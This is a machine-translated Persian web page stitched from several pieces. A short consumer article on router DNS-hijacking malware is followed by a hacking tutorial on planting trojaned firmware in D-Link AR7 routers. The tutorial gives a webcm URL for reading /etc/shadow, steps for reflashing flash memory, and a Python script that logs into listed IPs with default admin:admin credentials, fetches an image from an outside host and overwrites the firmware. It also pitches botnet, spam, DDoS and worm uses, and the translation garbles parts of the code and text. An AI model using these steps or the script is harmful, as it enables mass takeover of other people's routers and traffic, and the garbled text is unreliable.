بررسی روتر برای ویروس zyxel. لیست کامل دستگاه های آسیب پذیر

این ممکن است برای شما عجیب به نظر برسد، اما ویروس هایی وجود دارند که نه رایانه ها، نه لپ تاپ ها و نه را آلوده می کنند دستگاه های تلفن همراهو روترها

چرا این کار را انجام دهید؟ سپس، اگرچه روتر شما هیچ کدام را ذخیره نمی کند اطلاعات ارزشمند، دسترسی به این دستگاهبه شما امکان می دهد تنظیمات سرور DNS را تغییر دهید. این به نوبه خود به کلاهبرداران اجازه می‌دهد تا برخی از درخواست‌های شما را به سایت‌های جعلی که در آن وارد خواهید شد، ارسال کنند اطلاعات محرمانه، برای کلاهبرداران مفید است. بسیاری از مدل های روتر مستعد ابتلا به عفونت هستند. برای ایمنی شما، توصیه هایی را با توصیه هایی توصیه می کنم که به شما امکان می دهد از عفونت جلوگیری کنید.

ویروس چگونه کار می کند؟

کامپیوتر شما به ویروسی به نام Win32.Sector آلوده می شود. این به نوبه خود Trojan.Rbrute را از یک سرور ویژه دانلود می کند، که شبکه را برای روترها جستجو می کند و سعی می کند به پیکربندی دسترسی پیدا کند. پس از دسترسی، جریان را تغییر می دهد آدرس های DNS، ثبت شده در روتر، به خودتان. سپس، تمام دستگاه‌های متصل به روتر به صفحه‌ای می‌رسند که Win32.Sector از آن دانلود می‌شود.

• نماد «اینترنت» روشن است، اما نمی‌توانید به بیشتر سایت‌ها دسترسی پیدا کنید یا سایت‌های اشتباهی که می‌خواهید باز کنید بارگیری می‌شوند.
• وب سایت های عجیب و غریب به طور خود به خود باز می شوند
• رایانه نمی تواند یک آدرس IP از شبکه شما دریافت کند (آدرسی مانند 169.254.xxx.xxx زیرشبکه مایکروسافت به آن اختصاص داده شده است)

چگونه ویروس Trojan.Rbrute را از روتر حذف کنیم؟

1. ابتدا باید روتر خود را به تنظیمات کارخانه بازنشانی کنید. برای انجام این کار، دکمه "Reset" را در پنل پشتی روتر فشار دهید و 10 ثانیه صبر کنید تا روتر تمام نشانگرها را چشمک بزند و راه اندازی مجدد شود.

2. به پنل مدیریت روتر بروید و تغییر دهید رمز عبور استانداردبرای دسترسی به پنل مدیریت به تنهایی، ترجیحا پیچیده تر.

3. ما دوباره روتر را پیکربندی می کنیم، بررسی می کنیم که آیا اینترنت به درستی کار می کند یا خیر.

4. از وب سایت رسمی سازنده روتر دانلود کنید آخرین سیستم عاملبرای مدل شما و فلش کنید. به احتمال زیاد در آخرین نسخهحفره‌های سفت‌افزاری که مهاجمان از طریق آن به تنظیمات روتر دسترسی پیدا کردند، بسته شده‌اند.

5. پس از این کار، کامپیوتر را از نظر بدافزار بررسی می کنیم تا احتمال باقی ماندن WinSector یا Trojan.Rbrute در هارد دیسک کامپیوتر را رد کنیم. این کار قابل انجام است وجوه رایگاناز مقاله

امیدوارم مقاله من به شما کمک کرده باشد =)

سلام خواننده من! در این مقاله در مورد روترهای عالی ADSL صحبت خواهم کرد
- ضروری در خانه و شبکه های صنعتیتکه های آهن من در مورد سوال به شما می گویم
بهره برداری از این غدد برای اهداف مفید برای ما - خیاطی در وحشیانه
تروجان داخل روتر و به گونه ای که هیچ کس متوجه نشود
یک مدیر هوشمند، نه یک کاربر هوشمند.

خواسته ها یا الزامات IQ

وقتی این مقاله را نوشتم، تصور کردم که خواندن آن کافی است
کاربر پیشرفته با GNU\Linux نصب شده که مهارت هایی نیز دارد
کار و برنامه نویسی در این سیستم عامل. با این حال، به نظر می رسد
ممکن است مراحل من را در ویندوز تکرار کنم (مثلاً با استفاده از Cygwin)، اما
این توضیح داده نخواهد شد. برای به دست آوردن حداکثر لذت شما نیز نیاز دارید
مهارت های آهن لحیم کاری (این اختیاری است).

و همه چیز شروع شد...

یه جورایی حواسم پرت شد بنابراین، همه چیز از زمانی شروع شد که همین یکی یک روز تلفن را قطع کرد
قطعه سخت افزاری، یا بهتر است بگوییم، خیانتکارانه اتصال به اینترنت را قطع کرد و این کار را نکرد
من می خواستم آن را بازیابی کنم. در همان زمان، او بسیار دور بود و از نظر فیزیکی در دسترس بود
من برای دیدن او نیامدم (با این حال، به نوعی دروغ می گفتم - خیلی تنبل بودم که از روی مبل بلند شوم
روتر را دوباره راه اندازی کنید :))، رابط وب پاسخ نداد، اما من آن را به یاد آوردم
این چیز باید telnet یا ssh داشته باشد. وارد بخش مدیریت شوید
من قبلاً آن را امتحان نکرده بودم و بدون ملاحظه رمز عبور خود را تغییر ندادم حساب(چطور
بعدا معلوم شد، بسیار بیهوده، زیرا به طور پیش فرض "admin:admin" است). پس من
SSH را امتحان کرد و کار کرد!

$ssh [ایمیل محافظت شده]
$Password:

مثل یک پیچ از آبی! BusyBox! هرگز به این موضوع فکر نکردم که تحت چه کسی است
این روتر کنترل می شود، معلوم است - گنو/لینوکس! احساس وحشت کردم
من تعجب می کنم که چگونه همه چیز اینجا کار می کند، و از نظر ذهنی به لطف تنبلی و شانس، من
وارد تحقیق شد

مجموعه اطلاعات

پس از کجا شروع کردم؟ البته از لیست دستورات موجود:

#جعبه مشغول
...
توابع تعریف شده فعلی:
[, خاکستر, busybox, cat, chgrp, chmod, chown, cp, date, dd, df, echo, false, free,
grep، نام میزبان، شناسه، ifconfig، init، insmod، kill، ln، لاگین، ls، lsmod، mkdir،
modprobe, mount, mv, passwd, ping, ps, pwd, reboot, rm, rmmod, route, sh, sleep,
همگام سازی، تار، تست، tftp، لمس، درست، tty، مقدار، wget، whoami، بله

مجموعه کاملا معقول است، برای تحقیق عادی و اجرای ایده ها کافی است.
بعد، علاقه به نسخه هسته بیدار شد:

# cat /proc/version
نسخه لینوکس 2.4.17_mvl21-malta-mips_fp_le (root@xy) (gcc نسخه 2.95.3
20010315 (انتشار/MontaVista)) #1 پنجشنبه 28 دسامبر 05:45:00 CST 2006

برای مرجع: MontaVista توزیعی است که هدف آن embedded است
سیستم های. اکثریت قریب به اتفاق تولید کنندگان تجهیزات شبکهبخشید
اولویت برای این سیستم همچنین می توان آن را در دستگاه های دیگر، به عنوان مثال، در
کتاب های الکترونیکی یا تلفن های همراه.

# cat /etc/versions
CUSTOMER=DLinkRU
MODEL=DSL-500T
VERSION=V3.02B01T01.RU.20061228
HTML_LANG=EN.302
BOARD=AR7VW
VERSION_ID=
CPUARCH_NAME=AR7
MODEL_ID=
FSSTAMP=20061228055253

# cat /proc/cpuinfo
پردازنده
: 0
مدل cpu
: MIPS 4KEc V4.8
BogoMIPS
: 149.91
دستورالعمل صبر کنید: خیر
تایمرهای میکروثانیه: بله
بردار وقفه اضافی: بله
نقطه نظارت سخت افزاری: بله
استثناهای VCED: در دسترس نیست
استثناهای VCEI: در دسترس نیست

AR7 یک تراشه دو هسته ای است که توسط Texas Instruments ساخته شده است. او
شامل یک روتر ADSL تمام عیار بر روی یک تراشه است که از استانداردهای ADSL1 پشتیبانی می کند،
ADSL2,ADSL2+. بر اساس پردازنده RISC با کارایی بالا MIPS 4KEc، با
فرکانس ساعت 175 یا 233 (بسته به تکنولوژی تولید: 18 میکرون
یا 13 میکرومتر). این تراشه شامل 2 رابط UART روی برد است که یکی از آنها (UART_A)
برای خروجی اطلاعات اشکال زدایی و همچنین یک رابط EJTAG که خدمت می کند استفاده می شود
برای اشکال زدایی (سیرم افزار) حافظه فلش. استفاده از این رابط ها مورد بحث قرار خواهد گرفت
در زیر شرح داده شده است.

در نهایت به اطلاعات حافظه نگاه کردم:

# cat /proc/mounts
/dev/mtdblock/0/squashfs ro 0 0
هیچ /dev devfs rw 0 0
proc /proc proc rw 0 0
ramfs /var ramfs rw 0 0

# cat /proc/mtd
dev: اندازه پاک کردن نام
mtd0: 0034f000 00010000 "mtd0"
mtd1: 00090f70 00010000 "mtd1"
mtd2: 00010000 00002000 "mtd2"
mtd3: 00010000 00010000 "mtd3"
mtd4: 003e0000 00010000 "mtd4"

به طور طبیعی، بدون فراموش کردن آدرس های بلوک:

# cat /proc/ticfg/env | grep mtd
mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000,0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000

از موارد فوق نتیجه می گیرد که حافظه فلش (/dev/mtdblock) دارای 5 بلوک است:

mtd0- تصویر سیستم فایل SquashFs. این یک فایل خاص است
سیستمی که فشرده و فقط خواندنی است. برای
الگوریتم فشرده سازی gzip استفاده می شود، اما در در این مورد- LZMA (نسبت تراکم
بالاتر). حجم این بلوک 4 مگابایت است.

mtd1– این بلوک حاوی هسته MontaVista است که با الگوریتم LZMA فشرده شده است
شرایط، اندازه بلوک 600 کیلوبایت.

mtd2– بوت لودر ADAM2، هسته را بارگذاری می کند، همچنین دارای
سرویس سرور FTP برای بازیابی و فلش. جزئیات بیشتری در مورد آن وجود خواهد داشت
در ادامه بیان شد. حجم بلوک 64 کیلوبایت است.

mtd3- بین داده های پیکربندی و محیط تقسیم می شود
بلوک (متغیرهای محیطی) که می توانید در /proc/ticfg/env به آن نگاه کنید.
داده های پیکربندی در /etc/config.xml قرار دارند. واسطه بین فایل
سیستم، بلوک پیکربندی بسته است (مانند همه cm_*، کنترل، o
آنها را بعدا) برنامه cm_logic. حجم این بلوک نیز 64 کیلوبایت است.

mtd4- این شامل امضای سیستم عامل، هسته و تصویر فایل است
سیستم های. این بلوک هنگام به روز رسانی سیستم عامل از طریق رابط وب استفاده می شود.
ابتدا در این بلوک ذخیره می شود، سپس چک جمع بررسی می شود
و اگر مناسب باشد، برای مکان جدیدش ثبت نام می کند.

رم (16 مگابایت در این مدل، اما ADAM2 در این مدل
فقط 14 مگابایت می بیند، با به روز رسانی درمان می شود)، در پوشه /var نصب می شود و آن
شما به راحتی می توانید از آن برای اهداف ما استفاده کنید:

# رایگان
کل بافرهای مشترک رایگان استفاده شده
مم: 14276 10452 3824 0

فراموش نکنیم که فهرست فرآیندها را مرور کنیم. از موارد جالبی که در اینجا کمین کرده اند
دیمون ها: thttpd - وب سرور. dproxy - کش کردن پرس و جوهای DNSسرور پروکسی؛ ddnsd
- دیمون DNS؛ pppd... دیمون واقعی است که اتصال را از طریق پروتکل پیاده سازی می کند
PPP، و در پارامترها اطلاعات حساب را می بینیم. بنابراین، اگر روتر نیست
وانمود می کند که شلنگ است (بخوانید - نه در حالت پل)، سپس می توانید
سهولت گرفتن حساب

برنامه های cm_* بسته شده اند و کد منبع قبلاً شامل می شود
کامپایل شده (این برنامه ها نیز توسط Texas Instruments در D-Link توسعه یافته اند
نزاع بر سر عدم رعایت مجوزها فایده ای ندارد).

cm_logic– برنامه ای که منطق سیستم را از طریق آن کنترل می کند
پیکربندی در حال انجام است. /etc/config.xml را با آن همگام می کند
قسمت مربوط به محتویات /dev/ticfg (اشاره به mtd3).

cm_cli- رابط خط فرمانبرای مدیریت و پیکربندی
سیستم های. برای مثال تنظیمات اتصال از طریق این رابط انجام می شود.

cm_pc- راه اندازی و نظارت بر فرآیندها، ارتباط با قوانین
(به عنوان مثال، برنامه را به صورت دیمون اجرا کنید؛ قوانین همچنین شامل اطلاعاتی در مورد
پورت های باز) شرح داده شده در /etc/progdefs.xml؛ بلافاصله پس از بارگیری
هسته ها

webcm- رابط CGI، نشتی، به عنوان مثال به شما اجازه می دهد به /etc/shadow نگاه کنید،
به سادگی با دسترسی به URL.

http://192.168.1.1/../../../etc/shadow

من چیزی دریافت نکردم، thttpd چندان ساده نیست، اما اگر چنین است:

http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow

یک چیز دیگر. در صورت عدم دسترسی می توان از این برای جمع آوری اطلاعات استفاده کرد
ssh/telnet، اما دسترسی به رابط وب وجود دارد.

firmwarecfg- برای فلش کردن سیستم عامل از طریق رابط وب استفاده می شود. در ورودی
از این برنامه، یک تصویر با یک درخواست POST از رابط وب منتقل می شود، و آن را قبلا
پس از بررسی به حافظه فلش هدایت می شود چک جمعتصویر

در این مرحله، جمع آوری اطلاعات اولیه تکمیل می شود، زمان آن است که به سمت تصمیم گیری حرکت کنیم
اقدامات.

نصب ابزارهای توسعه و کامپایل سیستم عامل

سیستم عامل روترهای D-Link(و سایر موارد مبتنی بر گنو/لینوکس)
توزیع شده تحت مجوز GPL، می توانید آنها را در رسمی دریافت کنید
سرور FTP در واقع، شما می توانید هر یک از لیست سیستم عامل های پیشنهادی را انتخاب کنید،
آنها یکسان هستند (در مورد سری T). تحویل شامل کد منبع هسته، محیط،
ابزارها و زنجیره ابزار لازم برای توسعه/تدوین ابزارهای موجود
برنامه ها. باید به root باز شود و به متغیر محیط اضافه شود
مسیر PATH به دایرکتوری toolchain bin:

$ tar xvf tools.tgz
$ صادرات PATH=$PATH:/opt/

حال برای کامپایل خود سیستم عامل خود، به دایرکتوری بروید
با کدهای منبعو همین ساخت را اجرا کنید.

$ cd DSL/TYLinuxV3/src && make

سوالات زیادی در مورد فعال کردن پشتیبانی دستگاه پرسیده می شود (بهتر
به آنها پاسخ مثبت دهید). پس از تکمیل کامپایل، در دایرکتوری TYLinuxV3/images
تصاویر سیستم عامل ایجاد خواهد شد. همچنین می توانید اسکریپتی را با همان نام خود اجرا کنید
مدل از دایرکتوری /TYLinuxV3/src/scripts.

چند کلمه در مورد انتقال فایل بین روتر و کامپیوتر. اولین
روشی که من استفاده کردم توانایی انتقال فایل ها از طریق پروتکل SSH است،
برای این کار از برنامه scp استفاده کنید. اما کمی بعد متوجه شدم که mc (نیمه شب
Commander) همچنین قابلیت اتصال از طریق SSH (پنل -> اتصال شل) را دارد.
از طرف دیگر، می توانید یک سرور وب یا FTP در محل کار خود راه اندازی کنید. بعدا من
من به وب سرور ترجیح دادم، زیرا سریعترین کار را انجام می دهد. من آن را نصب کردم
thttpd، کوچک و سریع، درست مانند روتر. ما آن را در خانه راه اندازی می کنیم و آن را دانلود می کنیم
فایل روتر، پس از رفتن به پوشه /var (همانطور که گفته شد
قبل از آن، برای ضبط در دسترس است).

$ thttpd -g -d ~/ForRouter -u user -p 8080
# سی دی /var
# wget http://192.168.1.2/file

برای دانلود یک فایل از روتر، می توانید وب سرور را نیز بالا ببرید:

# thttpd -g -d /var -u ریشه -p 8080

لطفا توجه داشته باشید که اگر می خواهید یک فایل اجرایی را از روتر دانلود کنید، باید
حذف حقوق راه اندازی هنگام دانلود مقدار زیادفایل ها از روتر
بهتر است از mc استفاده کنید، لازم نیست ابتدا فایل ها را در /var کپی کنید و
حقوق را حذف کنید و سپس این فایل ها را حذف کنید تا فضا آزاد شود. به طور کلی، موضوع
سلیقه، هر گزینه ای که برای شما مناسب است را انتخاب کنید.

ایجاد برنامه خود

البته بیایید با یک برنامه نویسی کلاسیک شروع کنیم - HelloWorld. چند تا خاص
مقرراتی در کار نیست. متن برنامه به طرز دردناکی آشناست:

#عبارتند از
#عبارتند از

int main (void)
{
printf("Mate.Feed.Kill.Repeat.");
بازگشت 0;
}

کامپایل (مسیر زنجیره ابزار باید در متغیر محیطی مشخص شود
مسیر):

$ mips_fp_le-gcc hell.c -o hell
$ mips_fp_le-strip -s hell

# سی دی /var
# chmod + x hell
# ./جهنم

و... هیچ اتفاقی نمی افتد یا اعلان مسیر ظاهر می شود پیدا نشد. چیست؟
مورد؟ من قبلاً در مورد cm_pc صحبت کرده ام - این برنامه برنامه های دیگر را راه اندازی می کند
طبق قوانین توضیح داده شده در /etc/progdefs.xml. اکنون زمان آن فرا رسیده است
تغییر و فلش کردن تصاویر سیستم فایل.

اصلاح سیستم فایل

برای تغییر سیستم فایل، ابتدا باید
باز کردن بسته بندی همانطور که قبلاً اشاره کردم، سیستم فایل در اینجا SquashFs با پچ LZMA است.
بسته توسعه سیستم عامل فقط شامل برنامه mksquashfs (برای ایجاد
تصویر)، unsquashfs (برای باز کردن بسته بندی) وجود ندارد. اما مهم نیست، همه چیز در دسترس است
در وب سایت سیستم فایل، به نسخه اول نیاز داریم. با اعمال پچ LZMA و
پس از جمع آوری وسایل برقی، آنها را در یک مکان مناسب کنار می گذاریم. ابتدا تصویر را دریافت می کنیم
سیستم فایل از روتر:

# cat /dev/mtdblock/0 > /var/fs.img

$ mkdir unpacked_fs
$ unsquashfs fs.img unpacked_fs

اکنون می توانید آن را هر طور که دوست دارید تغییر دهید، و ما می توانیم آن را به FuckTheWorld ارسال کنیم
دایرکتوری bin / و یک قانون برای اجرا در /etc/progdefs.xml اضافه کنید.

$ cp سلام unpacked_fs/bin
$ vim unpacked_fs/etc/progdefs.xml

و این را اضافه می کنیم (بین تگ ها ):

جهنم
/bin/hell

ذخیره و بسته بندی مجدد:

$ mksquashfs unpacked_fs my_fs.img -noappend

لطفا توجه داشته باشید که تصویر سیستم فایل نباید بیشتر باشد
اندازه های قابل قبول اگر احساس می‌کنید که می‌خواهید چیزی را فوراً امتحان کنید، اما این کار را نمی‌کند
مناسب است، هر چیزی "غیر ضروری" را از تصویر حذف کنید، مانند grep، whoami، یا
از بسته بندی استفاده کنید فایل های اجرایی UPX. اکنون آن را در روتر دانلود کنید
تصویر و به بخش بعدی بروید.

ضبط تصویر سیستم فایل

روش فلش کردن روتر بسیار ساده است و شامل دسترسی به دستگاه است
/dev/mtdblock/*. بنابراین، روتر را با هر کدام پر کنید به روشی مناسبتصویر فایل
سیستم و این عمل ساده را انجام دهید:

# cat my_fs.img > /dev/mtdblock/0 && راه اندازی مجدد

# cp my_fs.img /dev/mtdblock/0 && راه اندازی مجدد

پس از مدتی، هنگامی که فرآیند ضبط به پایان رسید، روتر راه اندازی مجدد می شود، و
تغییرات اعمال خواهد شد بیایید سعی کنیم مثال خود را اجرا کنیم:

# جهنم
Mate.feed.Kill.Repeat.

روش های بازیابی در صورت شکست

قبل از اینکه روتر خود را با "صنایع دستی" جدی تر فلش کنید، باید نحوه انجام آن را بیابید
در موارد بحرانی که روتر امتناع می کند، اقدام کند
بار. هیچ موقعیت ناامید کننده ای وجود ندارد. سرور ADAM2 FTP به کمک می آید. برای
ابتدا باید یک کلاینت FTP را به آدرس IP ADAM2 راه اندازی کنید که می توانید از آن جاسوسی کنید
در /proc/ticfg/env (پارامتر my_ipaddress).

$ftp 192.168.1.199
220 ADAM2 سرور FTPآماده.
530 لطفا با USER و PASS وارد شوید.

برای وضوح، می توانید حالت اشکال زدایی و سپس همه را روشن کنید
اطلاعات و تمام پاسخ های FTP:

ورود/گذرواژه – adam2/adam2. فرآیند فلش کردن بسیار ساده است. برای شروع
جلسه FTP را به حالت باینری تغییر دهید:

ftp> نقل قول MEDIA FLSH

حالا برای مثال تصویری از فایل سیستم ارسال می کنیم و مکان را مشخص می کنیم
مقاصد:

ftp> قرار دادن fs.img "fs.img mtd0"

ما منتظر پایان ضبط هستیم، روتر را راه اندازی مجدد کنید، از جلسه خارج شوید:

ftp> نقل قول راه اندازی مجدد
ftp> ترک

همه! همانطور که می بینید، هیچ چیز پیچیده ای وجود ندارد، حالا اگر مشکلی پیش بیاید، شما
شما همیشه می توانید وضعیت را اصلاح کنید.

برای سهولت استفاده، باید یک آدرس IP معمولی را فعال کنید
بارگیری خودکار (به طوری که با تنظیم مجدد رقص نکنید) و زمان را کمی افزایش دهید
انتظار برای اتصال قبل از بارگیری کرنل. همه این پارامترها در ذخیره می شوند
متغیرهای محیطی، خاص وجود دارد دستورات FTP ADAM2: GETENV و SETENV (برای
دریافت و تنظیم یک متغیر به ترتیب). که در جلسات FTPزیر را وارد کنید
دستورات:

ftp> بارگذاری خودکار SETENV، 1
ftp> SETENV autoload_timeout,8
ftp>SETENV my_ipaddress,192.168.1.1
ftp> نقل قول راه اندازی مجدد
ftp> ترک

روتر راه اندازی مجدد می شود و می توانید در 192.168.1.1:21 به ADAM2 دسترسی داشته باشید. اگر
تمایل به بازتاب مجدد تصویر هسته وجود خواهد داشت و هسته از بوت کردن، FTP خودداری می کند.
خود به خود شروع خواهد شد. قبل از فلش کردن تصاویر اصلاح شده، حتما این کار را انجام دهید
موارد فعلی را برای بازیابی ذخیره کنید. به طور کلی می توانید متغیرهای محیط را تغییر دهید
و از طریق /proc/ticfg/env، من فقط می خواستم در مورد کار با FTP بیشتر به شما بگویم.

# echo my_ipaddress 192.168.1.1 > proc/ticfg/env

می توانید تغییرات را به صورت زیر بررسی کنید:

# cat /proc/ticfg/env | grep my_ipaddress

اگر می خواهید بوت لودر را مجدداً فلش کنید چه باید کرد و چگونه
در صورت شکست چه باید کرد؟ یا روتر به دلایلی شروع نمی شود و
به ADAM2 دسترسی ندارید؟ یک راه حل وجود دارد - JTAG، یا بهتر است بگوییم، این تراشه حاوی EJTAG است
(نسخه توسعه یافته). این یک رابط برای اشکال زدایی/برنامه نویسی در مدار است.

برای اتصال به این رابط به یک پورت LPT کامپیوتر نیاز داریم،
کانکتور و 4 مقاومت طرح ساده است.

من عجله می کنم که سیستم عامل از طریق JTAG کار سریعی نیست، بسیار طول می کشد
زمان زیاد. بنابراین فقط باید برای بازیابی بوت لودر استفاده شود،
حتی اگر کار نکند برای برقراری ارتباط از طریق JTAG، باید از یک ویژه استفاده کنید
برنامه، به عنوان مثال UrJTAG. در زیر نمونه ای از نحوه عملکرد این رابط را مشاهده می کنید.
راه اندازی اتصال:

jtag> کابل موازی 0x378 DLC5
jtag> شناسایی

تشخیص حافظه فلش:

jtag> detectflash 0x30000000 1

خواندن حافظه فلش:

jtag> readmem 0x30000000 0x400000 fullflash.img

نوشتن در حافظه (بوت لودر):

jtag> flashem 0x30000000 adam2.img

همچنین دانستن در مورد رابط UART مفید است (قبلاً قول داده بودم در مورد آن صحبت کنم). که در
UART_A گزارش می دهد، یعنی بوت لودر را ثبت می کند (در مرحله اولیه بوت شدن از
می توانید با او ارتباط برقرار کنید) و هسته. هنگام نوشتن کرنل های اصلاح شده این
برای رفع اشکال ضروری است. UART - گیرنده/فرستنده ناهمزمان جهانی
(فرستنده ناهمزمان جهانی) تقریباً همیشه روی آن وجود دارد
میکروکنترلرها

مدار آداپتور بسیار ساده است. بر اساس تنها یک تراشه -
مبدل سطح TTL: MAX232 برای COM و FT232R برای USB. ریز مدارها
آنها بسیار رایج هستند و هیچ مشکلی در خرید وجود نخواهد داشت.

مدار بر روی مونتاژ می شود تخته نان(که به راحتی در کیس قرار می گیرد
کانکتور پورت COM) در 20 دقیقه و مزایای زیادی را به همراه دارد. به عنوان مثال، هنگام اشکال زدایی
هسته ها یک راه حل کاملا غیرقابل جایگزین هستند. اگر لوازم الکترونیکی مشکل داشته باشند چه؟ خارج شوید
کابل های USB برای گوشی های قدیمی هستند، آنها فقط یک مبدل دارند
UART - USB.

چند ایده توزیع

داشتن پروکسی/سوکس خود در روتر شخص دیگری عالی است. درست مثل ارسال هرزنامه
روتر برای همه پروتکل ها این یک کامپیوتر ویندوزی نیست، که
هر ماه مرتب می شود :). روترها اغلب تغییر نمی کنند یا دوباره فلش می شوند. بله و
چه کسی غیر از ما حتی به فکر آلوده کردن یک روتر است؟

فراموش نکنید، ما تمام ترافیک کاربر/شبکه ​​را تحت کنترل داریم. برای بیشتر
در روترهای قدرتمند، امکان آویز کردن ربات DDOS وجود دارد. مخفی کردن فایل/پنهان کردن فرآیند،
رهگیری نوشتن در بلوک های mtd بدون بازنویسی برنامه ما - همه اینها
هر چه!

فرض کنید می خواهید شروع به نوشتن یک برنامه جدی برای روتر کنید.
اشکال زدایی بسیار خوب مهم است، احتمالاً باید چندین بار آن را انجام دهید
بازنویسی/بازیابی تصاویر... این یک چشم انداز بسیار غم انگیز است. حتی دست ها
اگر منبع بازنویسی حافظه فلش را نیز در نظر بگیرید، کمی رها کنید
کوچک است (جزئیات بیشتر در اسناد مربوط به تراشه حافظه)، و چشم انداز وجود دارد
خرابش کن اما راهی برای خروج وجود دارد! Qemu می تواند AR7 را تقلید کند! می توانید تصور کنید چه چیزی
آیا فرصت ها و راحتی نامحدود را فراهم می کند؟ حالا هیچ چیز ما را متوقف نمی کند
چیزی فوق العاده جالب بنویس!

بنابراین. شما یک برنامه نوشتید، آن را روی روترهای خودتان یا 1-2 نفر دیگر تست کردید، اما
کل شبکه هنوز در پیش است، آلوده کردن دستی آن یک کار طاقت فرسا است، در روتر دهمی که قبلاً شروع کرده اید
لعنت به تمام دنیا، و رشته های «گربه» و «متد» در چشمانت شناور است. بیا بنویسیم
برنامه ای برای خودکارسازی اینها اقدامات روتین. من زبان پایتون را انتخاب کردم.

برنامه کاری به شرح زیر است:

• برای مثال با استفاده از nmap فهرستی از روترها را جمع آوری کنید.
• اسکریپت باید آدرس های IP را به ترتیب از لیست بگیرد، از طریق وارد کنید
  شبکه راه دور با ورود / رمز عبور استاندارد؛
• سپس همان مراحل: آپلود تصویر اصلاح شده،
  بازنویسی، راه اندازی مجدد

#!/usr/bin/env پایتون
#Encode=UTF-8

واردات telnetlib، زمان

SERVER="http://anyhost.com/fs.image"

برای adr در open("iplist.txt"):
telnet = telnetlib.Telnet(addr)
telnet.set_debuglevel(1)
telnet.read_until("login:")
time.sleep (5)
telnet.write ("admin\n")
telnet.read_until("رمز عبور:")
telnet.write ("admin\n")
telnet.read_until("#")
telnet.write("cd /var && wget" + SERVER)
telnet.read_until("#")
telnet.write ("cat fs.image > /dev/mtdblock/0")
telnet.read_until("#")
telnet.write ("راه اندازی مجدد")
telnet.close()

منطق فیلمنامه بسیار دور از ایده آل است، حالا دلیل آن را توضیح می دهم. برای
ابتدا باید نسخه سفت‌افزار/کرنل و مدل روتر را بررسی کنید، زیرا ممکن است وجود داشته باشد
تفاوت های جدی در کار در مرحله بعد، به جای خالی های میان افزار، باید دانلود کنید
تصویر سیستم فایل از روتر، باز کردن بسته بندی، تغییر و ارسال
بازگشت. این مشکلات ناشی از سازگاری در موارد مختلف را از بین می برد
مدل‌ها/نسخه‌های میان‌افزار، زیرا ثبات عملکرد برای شما مهم‌ترین چیز است.
همچنین، یک ویروس می تواند عملکرد یک کرم را داشته باشد، و اگر بخواهید، همیشه می توانید
یک اسکنر شبکه، brute force برای RDP و ویژگی های مشابه را به آن وصل کنید.

یک راه عالی دیگر برای توزیع وجود دارد. هیچ چیز شما را از نوشتن باز نمی دارد
برنامه ای برای ویندوز که همراه خود خواهید داشت (یا از طریق خود دانلود کنید
سرور) تصویر سیستم را فایل کنید و در صورت وجود، روتر را با آن آلوده کنید.
این برنامه را به تمام روش های "استاندارد" توزیع کنید: درایوهای قابل جابجایی،
اکسپلویت برای برنامه ها، آلوده شدن برنامه های دیگر... با ترکیب این روش ها،
شما می توانید یک بیماری همه گیر جدی ایجاد کنید. فقط این تصویر را تصور کنید - بالاخره
دستگاه های مشابهدر همه جا توزیع شده است.

محافظت از روتر

با حفاری همه اینها، فکر کردم: چگونه می توانم از روتر محافظت کنم؟ و سپس، می بینید، و
من خودم به آنجا خواهم رسید. اولین قدم این است که رمز عبور کاربر را به یک رمز عبور پیچیده تر تغییر دهید
طولانی (محدودیت 8 کاراکتر)، تغییر بنرها و تبریک خدمات
(ویرایشگر هگز، یا ترجیحاً برنامه ها را دوباره کامپایل کنید) به ترتیب
nmap یا سایر اسکنرها نمی توانند نسخه های سرویس را تعیین کنند.

همچنین باید پورت هایی که دیمون ها روی آن آویزان هستند را تغییر دهید. این کار توسط
تغییرات در progdefs.xml. Telnet را بکش (آسانترین راه برای حدس زدن رمز عبور، بله
و پروتکل محافظت نشده است، چرا به آن نیاز داریم)، ​​فایروال را فعال کنید، اتصال را مجاز کنید
فقط از آدرس IP یا MAC خود به خدمات دسترسی داشته باشید. از فایروال هم استفاده کنید
برای محافظت از یک شبکه یا رایانه، بی دلیل نیست که وجود دارد. راه اندازی هوشمند
قوانین همیشه به شما کمک می کند از خود محافظت کنید.

نتیجه

نه تنها روترهای D-Link و سایر دستگاه های مشابه روی بسیاری ساخته شده اند
چیپ AR7، لیست شامل Acorp، NetGear، Linksys، Actionec... کاملا
این AR7 همراه با MontaVista محبوب است. نتیجه می شود که با استفاده از همان
زنجیره ابزار، بدون مشکلات خاصمی توانید مراحل توضیح داده شده در مقاله را انجام دهید.

در مورد آن فکر کنید: علاوه بر این اقدامات مخربمی توانید کاری مفید/خوشایند برای خود انجام دهید
و دیگران (من بحث نمی کنم، لذت هک نمی تواند جایگزین شود، اما هنوز).
شما می توانید سیستم عامل خود را، به عنوان مثال، بیشتر بسازید روترهای قدرتمند، توانا
دانلود / توزیع تورنت ... همه مدل ها دارای رابط USB 1.1 هستند اما در مدل های جوان تر
مدل های آن لحیم کاری نشده است. یک ماژول USB و یک درایور سیستم فایل را به هسته اضافه کنید،
روتر را به حافظه فلش مجهز کنید - و در پایان چیزی شبیه به این دریافت خواهید کرد ذخیره سازی شبکهپشت
پول کم گزینه های زیادی وجود دارد، اما ایده ها باید هزاران نفر به وجود بیایند - نه
خود را محدود کنید، ایجاد کنید و خلق کنید!

قبلاً در مورد جایگزینی DNS نوشتیم که در نتیجه آن تبلیغات و بنرهای باج افزار روی رایانه ظاهر شد. در تعدادی از موارد، سرورهای DNS نه تنها در ویندوز، بلکه در روتر نیز تغییر کردند. از نظر فنی به درستی، جایگزینی DNS، البته، یک ویروس به معنای کلاسیک کلمه نیست، بلکه یک تنظیمات مخرب است که با این وجود ناراحتی های زیادی را به همراه دارد.

تعویض سرورهای DNS چه فایده ای دارد و چه ضرری دارد؟

سرور DNS مسئول نگاشت نام دامنه به آدرس های IP است. سرورهای DNS تقلبی می توانند نام هر وب سایت قانونی را با آدرسی دیگر - آدرس نادرست - مطابقت دهند و محتوای جایگزین را به جای واقعی بارگیری کنند. اگر چنین DNS "اشتباهی" را در روتر ثبت کنید، پس همهدستگاه های متصل به آن در خطر خواهند بود.

